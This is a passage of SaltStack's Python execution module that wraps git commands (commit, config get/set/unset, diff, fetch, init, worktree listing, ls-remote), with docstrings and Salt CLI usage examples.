.. versionadded:: 2015.8.0
.. _`git-commit(1)`: http://git-scm.com/docs/git-commit
CLI Examples:
.. code-block:: bash
salt myminion git.commit /path/to/repo 'The commit message'
salt myminion git.commit /path/to/repo 'The commit message' filename=foo/bar.py
'''
cwd = _expand_path(cwd, user)
command = ['git', 'commit', '-m', message]
command.extend(_format_opts(opts))
if filename:
if not isinstance(filename, six.string_types):
filename = str(filename)
# Add the '--' to terminate CLI args, but only if it wasn't already
# passed in opts string.
command.extend(['--', filename])
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def config_get(key,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
Get the value of a key in the git configuration file
key
The name of the configuration key to get
.. versionchanged:: 2015.8.0
Argument renamed from ``setting_name`` to ``key``
cwd
The path to the git checkout
.. versionchanged:: 2015.8.0
Now optional if ``global`` is set to ``True``
global : False
If ``True``, query the global git configuration. Otherwise, only the
local git configuration will be queried.
.. versionadded:: 2015.8.0
all : False
If ``True``, return a list of all values set for ``key``. If the key
does not exist, ``None`` will be returned.
.. versionadded:: 2015.8.0
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.config_get user.name cwd=/path/to/repo
salt myminion git.config_get user.email global=True
salt myminion git.config_get core.gitproxy cwd=/path/to/repo all=True
'''
# Sanitize kwargs and make sure that no invalid ones were passed. This
# allows us to accept 'all' as an argument to this function without
# shadowing all(), while also not allowing unwanted arguments to be passed.
all_ = kwargs.pop('all', False)
result = _config_getter('--get-all',
key,
cwd=cwd,
user=user,
ignore_retcode=ignore_retcode,
**kwargs)
# git config --get exits with retcode of 1 when key does not exist
if result['retcode'] == 1:
return None
ret = result['stdout'].splitlines()
if all_:
return ret
else:
try:
return ret[-1]
except IndexError:
# Should never happen but I'm paranoid and don't like tracebacks
return ''
def config_get_regexp(key,
value_regex=None,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
r'''
.. versionadded:: 2015.8.0
Get the value of a key or keys in the git configuration file using regexes
for more flexible matching. The return data is a dictionary mapping keys to
lists of values matching the ``value_regex``. If no values match, an empty
dictionary will be returned.
key
Regex on which key names will be matched
value_regex
If specified, return all values matching this regex. The return data
will be a dictionary mapping keys to lists of values matching the
regex.
.. important::
Only values matching the ``value_regex`` will be part of the return
data. So, if ``key`` matches a multivar, then it is possible that
not all of the values will be returned. To get all values set for a
multivar, simply omit the ``value_regex`` argument.
cwd
The path to the git checkout
global : False
If ``True``, query the global git configuration. Otherwise, only the
local git configuration will be queried.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
CLI Examples:
.. code-block:: bash
# Matches any values for key 'foo.bar'
salt myminion git.config_get_regexp /path/to/repo foo.bar
# Matches any value starting with 'baz' set for key 'foo.bar'
salt myminion git.config_get_regexp /path/to/repo foo.bar 'baz.*'
# Matches any key starting with 'user.'
salt myminion git.config_get_regexp '^user\.' global=True
'''
result = _config_getter('--get-regexp',
key,
value_regex=value_regex,
cwd=cwd,
user=user,
ignore_retcode=ignore_retcode,
**kwargs)
# git config --get exits with retcode of 1 when key does not exist
ret = {}
if result['retcode'] == 1:
return ret
for line in result['stdout'].splitlines():
try:
param, value = line.split(None, 1)
except ValueError:
continue
ret.setdefault(param, []).append(value)
return ret
config_get_regex = salt.utils.alias_function(config_get_regexp, 'config_get_regex')
def config_set(key,
value=None,
multivar=None,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionchanged:: 2015.8.0
Return the value(s) of the key being set
Set a key in the git configuration file
cwd
The path to the git checkout. Must be an absolute path, or the word
``global`` to indicate that a global key should be set.
.. versionchanged:: 2014.7.0
Made ``cwd`` argument optional if ``is_global=True``
key
The name of the configuration key to set
.. versionchanged:: 2015.8.0
Argument renamed from ``setting_name`` to ``key``
value
The value to set for the specified key. Incompatible with the
``multivar`` argument.
.. versionchanged:: 2015.8.0
Argument renamed from ``setting_value`` to ``value``
add : False
Add a value to a key, creating/updating a multivar
.. versionadded:: 2015.8.0
multivar
Set a multivar all at once. Values can be comma-separated or passed as
a Python list. Incompatible with the ``value`` argument.
.. versionadded:: 2015.8.0
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
global : False
If ``True``, set a global variable
is_global : False
If ``True``, set a global variable
.. deprecated:: 2015.8.0
Use ``global`` instead
CLI Example:
.. code-block:: bash
salt myminion git.config_set user.email me@example.com cwd=/path/to/repo
salt myminion git.config_set user.email foo@bar.com global=True
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
add_ = kwargs.pop('add', False)
global_ = kwargs.pop('global', False)
is_global = kwargs.pop('is_global', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if is_global:
salt.utils.warn_until(
'Nitrogen',
'The \'is_global\' argument to git.config_set has been '
'deprecated, please set the \'cwd\' argument to \'global\' '
'instead.'
)
global_ = True
if cwd is None:
if not global_:
raise SaltInvocationError(
'\'cwd\' argument required unless global=True'
)
else:
cwd = _expand_path(cwd, user)
if all(x is not None for x in (value, multivar)):
raise SaltInvocationError(
'Only one of \'value\' and \'multivar\' is permitted'
)
if value is not None:
if not isinstance(value, six.string_types):
value = str(value)
if multivar is not None:
if not isinstance(multivar, list):
try:
multivar = multivar.split(',')
except AttributeError:
multivar = str(multivar).split(',')
else:
new_multivar = []
for item in multivar:
if isinstance(item, six.string_types):
new_multivar.append(item)
else:
new_multivar.append(str(item))
multivar = new_multivar
command_prefix = ['git', 'config']
if global_:
command_prefix.append('--global')
if value is not None:
command = copy.copy(command_prefix)
if add_:
command.append('--add')
else:
command.append('--replace-all')
command.extend([key, value])
_git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)
else:
for idx, target in enumerate(multivar):
command = copy.copy(command_prefix)
if idx == 0:
command.append('--replace-all')
else:
command.append('--add')
command.extend([key, target])
_git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)
return config_get(key,
user=user,
cwd=cwd,
ignore_retcode=ignore_retcode,
**{'all': True, 'global': global_})
def config_unset(key,
value_regex=None,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionadded:: 2015.8.0
Unset a key in the git configuration file
cwd
The path to the git checkout. Must be an absolute path, or the word
``global`` to indicate that a global key should be unset.
key
The name of the configuration key to unset
value_regex
Regular expression that matches exactly one key, used to delete a
single value from a multivar. Ignored if ``all`` is set to ``True``.
all : False
If ``True`` unset all values for a multivar. If ``False``, and ``key``
is a multivar, an error will be raised.
global : False
If ``True``, unset a global variable. Otherwise, a local variable
will be unset.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
CLI Example:
.. code-block:: bash
salt myminion git.config_unset /path/to/repo foo.bar
salt myminion git.config_unset /path/to/repo foo.bar all=True
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
all_ = kwargs.pop('all', False)
global_ = kwargs.pop('global', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if cwd is None:
if not global_:
raise SaltInvocationError(
'\'cwd\' argument required unless global=True'
)
else:
cwd = _expand_path(cwd, user)
command = ['git', 'config']
if all_:
command.append('--unset-all')
else:
command.append('--unset')
command.extend(_which_git_config(global_, cwd, user))
if not isinstance(key, six.string_types):
key = str(key)
command.append(key)
if value_regex is not None:
if not isinstance(value_regex, six.string_types):
value_regex = str(value_regex)
command.append(value_regex)
ret = _git_run(command,
cwd=cwd if cwd != 'global' else None,
runas=user,
ignore_retcode=ignore_retcode,
failhard=False)
retcode = ret['retcode']
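    # Exit code semantics below follow git-config(1): 1 means the section
    # or key is invalid, 5 means the option does not exist or multiple
    # values matched, and 6 means the value regexp was invalid.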
if retcode == 0:
return True
elif retcode == 1:
raise CommandExecutionError('Section or key is invalid')
elif retcode == 5:
        if config_get(key,
                      cwd=cwd,
                      user=user,
                      ignore_retcode=ignore_retcode) is None:
raise CommandExecutionError(
'Key \'{0}\' does not exist'.format(key)
)
else:
msg = 'Multiple values exist for key \'{0}\''.format(key)
if value_regex is not None:
msg += ' and value_regex matches multiple values'
raise CommandExecutionError(msg)
elif retcode == 6:
raise CommandExecutionError('The value_regex is invalid')
else:
msg = (
'Failed to unset key \'{0}\', git config returned exit code {1}'
.format(key, retcode)
)
if ret['stderr']:
msg += '; ' + ret['stderr']
raise CommandExecutionError(msg)
def current_branch(cwd, user=None, ignore_retcode=False):
'''
Returns the current branch name of a local checkout. If HEAD is detached,
return the SHA1 of the revision which is currently checked out.
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt myminion git.current_branch /path/to/repo
'''
cwd = _expand_path(cwd, user)
command = ['git', 'rev-parse', '--abbrev-ref', 'HEAD']
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def describe(cwd, rev='HEAD', user=None, ignore_retcode=False):
'''
Returns the `git-describe(1)`_ string (or the SHA1 hash if there are no
tags) for the given revision.
cwd
The path to the git checkout
rev : HEAD
The revision to describe
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-describe(1)`: http://git-scm.com/docs/git-describe
CLI Examples:
.. code-block:: bash
salt myminion git.describe /path/to/repo
salt myminion git.describe /path/to/repo develop
'''
cwd = _expand_path(cwd, user)
if not isinstance(rev, six.string_types):
rev = str(rev)
command = ['git', 'describe']
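    # Only append --always (fall back to an abbreviated SHA1 when no tag
    # matches) on git versions which support it.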
if _LooseVersion(version(versioninfo=False)) >= _LooseVersion('1.5.6'):
command.append('--always')
command.append(rev)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def diff(cwd,
item1=None,
item2=None,
opts='',
user=None,
no_index=False,
cached=False,
paths=None):
'''
.. versionadded:: 2015.8.12,2016.3.3
Interface to `git-diff(1)`_
cwd
The path to the git checkout
item1 and item2
Revision(s) to pass to the ``git diff`` command. One or both of these
arguments may be ignored if some of the options below are set to
``True``. When ``cached`` is ``False``, and no revisions are passed
to this function, then the current working tree will be compared
against the index (i.e. unstaged changes). When two revisions are
passed, they will be compared to each other.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
no_index : False
When it is necessary to diff two files in the same repo against each
other, and not diff two different revisions, set this option to
``True``. If this is left ``False`` in these instances, then a normal
``git diff`` will be performed against the index (i.e. unstaged
changes), and files in the ``paths`` option will be used to narrow down
the diff output.
.. note::
Requires Git 1.5.1 or newer. Additionally, when set to ``True``,
``item1`` and ``item2`` will be ignored.
cached : False
If ``True``, compare staged changes to ``item1`` (if specified),
otherwise compare them to the most recent commit.
.. note::
            ``item2`` is ignored if this option is set to ``True``.
paths
File paths to pass to the ``git diff`` command. Can be passed as a
comma-separated list or a Python list.
.. _`git-diff(1)`: http://git-scm.com/docs/git-diff
CLI Example:
.. code-block:: bash
# Perform diff against the index (staging area for next commit)
salt myminion git.diff /path/to/repo
# Compare staged changes to the most recent commit
salt myminion git.diff /path/to/repo cached=True
# Compare staged changes to a specific revision
salt myminion git.diff /path/to/repo mybranch cached=True
# Perform diff against the most recent commit (includes staged changes)
salt myminion git.diff /path/to/repo HEAD
# Diff two commits
salt myminion git.diff /path/to/repo abcdef1 aabbccd
# Diff two commits, only showing differences in the specified paths
salt myminion git.diff /path/to/repo abcdef1 aabbccd paths=path/to/file1,path/to/file2
# Diff two files with one being outside the working tree
salt myminion git.diff /path/to/repo no_index=True paths=path/to/file1,/absolute/path/to/file2
'''
if no_index and cached:
raise CommandExecutionError(
'The \'no_index\' and \'cached\' options cannot be used together'
)
command = ['git', 'diff']
command.extend(_format_opts(opts))
if paths is not None and not isinstance(paths, (list, tuple)):
try:
paths = paths.split(',')
except AttributeError:
paths = str(paths).split(',')
ignore_retcode = False
failhard = True
if no_index:
if _LooseVersion(version(versioninfo=False)) < _LooseVersion('1.5.1'):
raise CommandExecutionError(
'The \'no_index\' option is only supported in Git 1.5.1 and '
'newer'
)
ignore_retcode = True
failhard = False
command.append('--no-index')
for value in [x for x in (item1, item2) if x]:
log.warning(
'Revision \'%s\' ignored in git diff, as revisions cannot be '
'used when no_index=True', value
)
elif cached:
command.append('--cached')
if item1:
command.append(item1)
if item2:
log.warning(
'Second revision \'%s\' ignored in git diff, at most one '
'revision is considered when cached=True', item2
)
else:
for value in [x for x in (item1, item2) if x]:
command.append(value)
if paths:
command.append('--')
command.extend(paths)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
failhard=failhard,
redirect_stderr=True)['stdout']
def fetch(cwd,
remote=None,
force=False,
refspecs=None,
opts='',
user=None,
identity=None,
ignore_retcode=False,
saltenv='base'):
'''
.. versionchanged:: 2015.8.2
Return data is now a dictionary containing information on branches and
tags that were added/updated
Interface to `git-fetch(1)`_
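    As an illustration, the return data for a fetch which brought in one
    new tag and updated one branch might be shaped like this (ref names
    and SHA1s are hypothetical):
    .. code-block:: python
        {'new tags': ['v1.2.3'],
         'updated branches': {'develop': {'old': 'abcdef1',
                                          'new': 'aabbccd'}}}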
cwd
The path to the git checkout
remote
Optional remote name to fetch. If not passed, then git will use its
default behavior (as detailed in `git-fetch(1)`_).
.. versionadded:: 2015.8.0
force
Force the fetch even when it is not a fast-forward.
.. versionadded:: 2015.8.0
refspecs
Override the refspec(s) configured for the remote with this argument.
Multiple refspecs can be passed, comma-separated.
.. versionadded:: 2015.8.0
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
        Key can also be specified as a SaltStack file server URL, e.g. salt://location/identity_file
.. versionchanged:: 2016.3.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-fetch(1)`: http://git-scm.com/docs/git-fetch
CLI Example:
.. code-block:: bash
salt myminion git.fetch /path/to/repo upstream
salt myminion git.fetch /path/to/repo identity=/root/.ssh/id_rsa
'''
cwd = _expand_path(cwd, user)
command = ['git', 'fetch']
if force:
command.append('--force')
command.extend(
[x for x in _format_opts(opts) if x not in ('-f', '--force')]
)
if remote:
if not isinstance(remote, six.string_types):
remote = str(remote)
command.append(remote)
if refspecs is not None:
if isinstance(refspecs, (list, tuple)):
refspec_list = []
for item in refspecs:
if not isinstance(item, six.string_types):
refspec_list.append(str(item))
else:
refspec_list.append(item)
else:
if not isinstance(refspecs, six.string_types):
refspecs = str(refspecs)
refspec_list = refspecs.split(',')
command.extend(refspec_list)
output = _git_run(command,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
redirect_stderr=True,
saltenv=saltenv)['stdout']
update_re = re.compile(
r'[\s*]*(?:([0-9a-f]+)\.\.([0-9a-f]+)|'
r'\[(?:new (tag|branch)|tag update)\])\s+(.+)->'
)
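    # update_re is meant to match the ref summary lines printed by
    # 'git fetch', for example (illustrative):
    #    abcdef1..aabbccd  develop     -> origin/develop
    #  * [new tag]         v1.2.3      -> v1.2.3
    #  * [new branch]      feature     -> origin/feature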
ret = {}
for line in salt.utils.itertools.split(output, '\n'):
match = update_re.match(line)
if match:
old_sha, new_sha, new_ref_type, ref_name = \
match.groups()
ref_name = ref_name.rstrip()
if new_ref_type is not None:
# ref is a new tag/branch
ref_key = 'new tags' \
if new_ref_type == 'tag' \
else 'new branches'
ret.setdefault(ref_key, []).append(ref_name)
elif old_sha is not None:
# ref is a branch update
ret.setdefault('updated branches', {})[ref_name] = \
{'old': old_sha, 'new': new_sha}
else:
# ref is an updated tag
ret.setdefault('updated tags', []).append(ref_name)
return ret
def init(cwd,
bare=False,
template=None,
separate_git_dir=None,
shared=None,
opts='',
user=None,
ignore_retcode=False):
'''
Interface to `git-init(1)`_
cwd
The path to the directory to be initialized
bare : False
If ``True``, init a bare repository
.. versionadded:: 2015.8.0
template
Set this argument to specify an alternate `template directory`_
.. versionadded:: 2015.8.0
separate_git_dir
Set this argument to specify an alternate ``$GIT_DIR``
.. versionadded:: 2015.8.0
shared
Set sharing permissions on git repo. See `git-init(1)`_ for more
details.
.. versionadded:: 2015.8.0
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-init(1)`: http://git-scm.com/docs/git-init
.. _`template directory`: http://git-scm.com/docs/git-init#_template_directory
CLI Examples:
.. code-block:: bash
salt myminion git.init /path/to/repo
# Init a bare repo (before 2015.8.0)
salt myminion git.init /path/to/bare/repo.git opts='--bare'
# Init a bare repo (2015.8.0 and later)
salt myminion git.init /path/to/bare/repo.git bare=True
'''
cwd = _expand_path(cwd, user)
command = ['git', 'init']
if bare:
command.append('--bare')
if template is not None:
if not isinstance(template, six.string_types):
template = str(template)
command.append('--template={0}'.format(template))
if separate_git_dir is not None:
if not isinstance(separate_git_dir, six.string_types):
separate_git_dir = str(separate_git_dir)
command.append('--separate-git-dir={0}'.format(separate_git_dir))
if shared is not None:
if isinstance(shared, six.integer_types):
shared = '0' + str(shared)
elif not isinstance(shared, six.string_types):
# Using lower here because booleans would be capitalized when
# converted to a string.
shared = str(shared).lower()
command.append('--shared={0}'.format(shared))
command.extend(_format_opts(opts))
command.append(cwd)
return _git_run(command,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def is_worktree(cwd, user=None):
'''
.. versionadded:: 2015.8.0
This function will attempt to determine if ``cwd`` is part of a
worktree by checking its ``.git`` to see if it is a file containing a
reference to another gitdir.
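    In a worktree, ``.git`` is a file rather than a directory, containing
    a single line similar to the following (path is illustrative):
    .. code-block:: text
        gitdir: /path/to/repo/.git/worktrees/mywt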
cwd
path to the worktree to be removed
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
CLI Example:
.. code-block:: bash
salt myminion git.is_worktree /path/to/repo
'''
cwd = _expand_path(cwd, user)
try:
toplevel = _get_toplevel(cwd)
except CommandExecutionError:
return False
gitdir = os.path.join(toplevel, '.git')
try:
with salt.utils.fopen(gitdir, 'r') as fp_:
for line in fp_:
try:
label, path = line.split(None, 1)
except ValueError:
return False
else:
# This file should only contain a single line. However, we
# loop here to handle the corner case where .git is a large
# binary file, so that we do not read the entire file into
# memory at once. We'll hit a return statement before this
# loop enters a second iteration.
if label == 'gitdir:' and os.path.isabs(path):
return True
else:
return False
except IOError:
return False
return False
def list_branches(cwd, remote=False, user=None, ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Return a list of branches
cwd
The path to the git checkout
remote : False
If ``True``, list remote branches. Otherwise, local branches will be
listed.
.. warning::
This option will only return remote branches of which the local
checkout is aware, use :py:func:`git.fetch
<salt.modules.git.fetch>` to update remotes.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.list_branches /path/to/repo
salt myminion git.list_branches /path/to/repo remote=True
'''
cwd = _expand_path(cwd, user)
command = ['git', 'for-each-ref', '--format', '%(refname:short)',
'refs/{0}/'.format('heads' if not remote else 'remotes')]
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout'].splitlines()
def list_tags(cwd, user=None, ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Return a list of tags
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.list_tags /path/to/repo
'''
cwd = _expand_path(cwd, user)
command = ['git', 'for-each-ref', '--format', '%(refname:short)',
'refs/tags/']
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout'].splitlines()
def list_worktrees(cwd, stale=False, user=None, **kwargs):
'''
.. versionadded:: 2015.8.0
Returns information on worktrees
.. versionchanged:: 2015.8.4
Version 2.7.0 added the ``list`` subcommand to `git-worktree(1)`_ which
provides a lot of additional information. The return data has been
changed to include this information, even for pre-2.7.0 versions of
git. In addition, if a worktree has a detached head, then any tags
which point to the worktree's HEAD will be included in the return data.
.. note::
By default, only worktrees for which the worktree directory is still
present are returned, but this can be changed using the ``all`` and
``stale`` arguments (described below).
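    As an illustration, the return data for a single worktree with a
    detached HEAD might be shaped like this (path, SHA1, and tag are
    hypothetical):
    .. code-block:: python
        {'/path/to/worktree': {'HEAD': 'abcdef0123456789abcdef0123456789abcdef01',
                               'branch': None,
                               'detached': True,
                               'stale': False,
                               'tags': ['v1.2.3']}}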
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
all : False
If ``True``, then return all worktrees tracked under
$GIT_DIR/worktrees, including ones for which the gitdir is no longer
present.
stale : False
If ``True``, return *only* worktrees whose gitdir is no longer present.
.. note::
Only one of ``all`` and ``stale`` can be set to ``True``.
.. _`git-worktree(1)`: http://git-scm.com/docs/git-worktree
CLI Examples:
.. code-block:: bash
salt myminion git.list_worktrees /path/to/repo
salt myminion git.list_worktrees /path/to/repo all=True
salt myminion git.list_worktrees /path/to/repo stale=True
'''
if not _check_worktree_support(failhard=True):
return {}
cwd = _expand_path(cwd, user)
kwargs = salt.utils.clean_kwargs(**kwargs)
all_ = kwargs.pop('all', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if all_ and stale:
raise CommandExecutionError(
'\'all\' and \'stale\' cannot both be set to True'
)
def _git_tag_points_at(cwd, rev, user=None):
'''
        Get any tags that point at a given revision
'''
return _git_run(['git', 'tag', '--points-at', rev],
cwd=cwd,
runas=user)['stdout'].splitlines()
def _desired(is_stale, all_, stale):
'''
Common logic to determine whether or not to include the worktree info
in the return data.
'''
if is_stale:
if not all_ and not stale:
# Stale worktrees are not desired, skip this one
return False
else:
if stale:
# Only stale worktrees are desired, skip this one
return False
return True
def _duplicate_worktree_path(path):
'''
Log errors to the minion log notifying of duplicate worktree paths.
These should not be there, but may show up due to a bug in git 2.7.0.
'''
log.error(
'git.worktree: Duplicate worktree path {0}. This may be caused by '
'a known issue in git 2.7.0 (see '
'http://permalink.gmane.org/gmane.comp.version-control.git/283998)'
.format(path)
)
tracked_data_points = ('worktree', 'HEAD', 'branch')
ret = {}
git_version = _LooseVersion(version(versioninfo=False))
has_native_list_subcommand = git_version >= _LooseVersion('2.7.0')
if has_native_list_subcommand:
out = _git_run(['git', 'worktree', 'list', '--porcelain'],
cwd=cwd,
runas=user)
if out['retcode'] != 0:
msg = 'Failed to list worktrees'
if out['stderr']:
msg += ': {0}'.format(out['stderr'])
raise CommandExecutionError(msg)
def _untracked_item(line):
'''
Log a warning
'''
log.warning(
'git.worktree: Untracked line item \'{0}\''.format(line)
)
for individual_worktree in \
salt.utils.itertools.split(out['stdout'].strip(), '\n\n'):
# Initialize the dict where we're storing the tracked data points
worktree_data = dict([(x, '') for x in tracked_data_points])
for line in salt.utils.itertools.split(individual_worktree, '\n'):
try:
type_, value = line.strip().split(None, 1)
except ValueError:
if line == 'detached':
type_ = 'branch'
value = 'detached'
else:
_untracked_item(line)
continue
if type_ not in tracked_data_points:
_untracked_item(line)
continue
if worktree_data[type_]:
log.error(
'git.worktree: Unexpected duplicate {0} entry '
'\'{1}\', skipping'.format(type_, line)
)
continue
worktree_data[type_] = value
# Check for missing data points
missing = [x for x in tracked_data_points if not worktree_data[x]]
if missing:
log.error(
'git.worktree: Incomplete worktree data, missing the '
'following information: {0}. Full data below:\n{1}'
.format(', '.join(missing), individual_worktree)
)
continue
worktree_is_stale = not os.path.isdir(worktree_data['worktree'])
if not _desired(worktree_is_stale, all_, stale):
continue
if worktree_data['worktree'] in ret:
_duplicate_worktree_path(worktree_data['worktree'])
wt_ptr = ret.setdefault(worktree_data['worktree'], {})
wt_ptr['stale'] = worktree_is_stale
wt_ptr['HEAD'] = worktree_data['HEAD']
wt_ptr['detached'] = worktree_data['branch'] == 'detached'
if wt_ptr['detached']:
wt_ptr['branch'] = None
# Check to see if HEAD points at a tag
tags_found = _git_tag_points_at(cwd, wt_ptr['HEAD'], user)
if tags_found:
wt_ptr['tags'] = tags_found
else:
wt_ptr['branch'] = \
worktree_data['branch'].replace('refs/heads/', '', 1)
return ret
else:
toplevel = _get_toplevel(cwd, user)
try:
worktree_root = rev_parse(cwd,
opts=['--git-path', 'worktrees'],
user=user)
except CommandExecutionError as exc:
msg = 'Failed to find worktree location for ' + cwd
log.error(msg, exc_info_on_loglevel=logging.DEBUG)
raise CommandExecutionError(msg)
if worktree_root.startswith('.git'):
worktree_root = os.path.join(cwd, worktree_root)
if not os.path.isdir(worktree_root):
raise CommandExecutionError(
'Worktree admin directory {0} not present'
.format(worktree_root)
)
def _read_file(path):
'''
Return contents of a single line file with EOF newline stripped
'''
try:
with salt.utils.fopen(path, 'r') as fp_:
for line in fp_:
ret = line.strip()
# Ignore other lines, if they exist (which they
# shouldn't)
break
return ret
except (IOError, OSError) as exc:
# Raise a CommandExecutionError
salt.utils.files.process_read_exception(exc, path)
for worktree_name in os.listdir(worktree_root):
admin_dir = os.path.join(worktree_root, worktree_name)
gitdir_file = os.path.join(admin_dir, 'gitdir')
head_file = os.path.join(admin_dir, 'HEAD')
wt_loc = _read_file(gitdir_file)
head_ref = _read_file(head_file)
if not os.path.isabs(wt_loc):
log.error(
'Non-absolute path found in {0}. If git 2.7.0 was '
'installed and then downgraded, this was likely caused '
'by a known issue in git 2.7.0. See '
'http://permalink.gmane.org/gmane.comp.version-control'
'.git/283998 for more information.'.format(gitdir_file)
)
# Emulate what 'git worktree list' does under-the-hood, and
# that is using the toplevel directory. It will still give
# inaccurate results, but will avoid a traceback.
wt_loc = toplevel
if wt_loc.endswith('/.git'):
wt_loc = wt_loc[:-5]
worktree_is_stale = not os.path.isdir(wt_loc)
if not _desired(worktree_is_stale, all_, stale):
continue
if wt_loc in ret:
_duplicate_worktree_path(wt_loc)
if head_ref.startswith('ref: '):
head_ref = head_ref.split(None, 1)[-1]
wt_branch = head_ref.replace('refs/heads/', '', 1)
wt_head = rev_parse(cwd, rev=head_ref, user=user)
wt_detached = False
else:
wt_branch = None
wt_head = head_ref
wt_detached = True
wt_ptr = ret.setdefault(wt_loc, {})
wt_ptr['stale'] = worktree_is_stale
wt_ptr['branch'] = wt_branch
wt_ptr['HEAD'] = wt_head
wt_ptr['detached'] = wt_detached
# Check to see if HEAD points at a tag
if wt_detached:
tags_found = _git_tag_points_at(cwd, wt_head, user)
if tags_found:
wt_ptr['tags'] = tags_found
return ret
def ls_remote(cwd=None,
remote='origin',
ref=None,
opts='',
user=None,
identity=None,
https_user=None,
https_pass=None,
ignore_retcode=False,
saltenv='base'):
'''
Interface to `git-ls-remote(1)`_. Returns the upstream hash for a remote
reference.
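    The return data maps each ref name to its SHA1 hash, for example
    (values are hypothetical):
    .. code-block:: python
        {'HEAD': 'aabbccddeeff...',
         'refs/heads/master': 'aabbccddeeff...'}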
cwd
The path to the git checkout. Optional (and ignored if present) when
``remote`` is set to a URL instead of a remote name.
remote : origin
The name of the remote to query. Can be the name of a git remote
(which exists in the git checkout defined by the ``cwd`` parameter),
or the URL of a remote repository.
.. versionchanged:: 2015.8.0
Argument renamed from ``repository`` to ``remote``
ref
The name of the ref to query. Optional, if not specified, all refs are
returned. Can be a branch or tag name, or the full name of the
        reference (for example, to get the hash for a GitHub pull request
        number 1234, ``ref`` can be set to ``refs/pull/1234/head``)
.. versionchanged:: 2015.8.0
Argument renamed from ``branch`` to ``ref``
.. versionchanged:: 2015.8.4
Defaults to returning all refs instead of master.
opts
Any additional options to add to the command line, in a single string
.. versionadded:: 2015.8.0
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
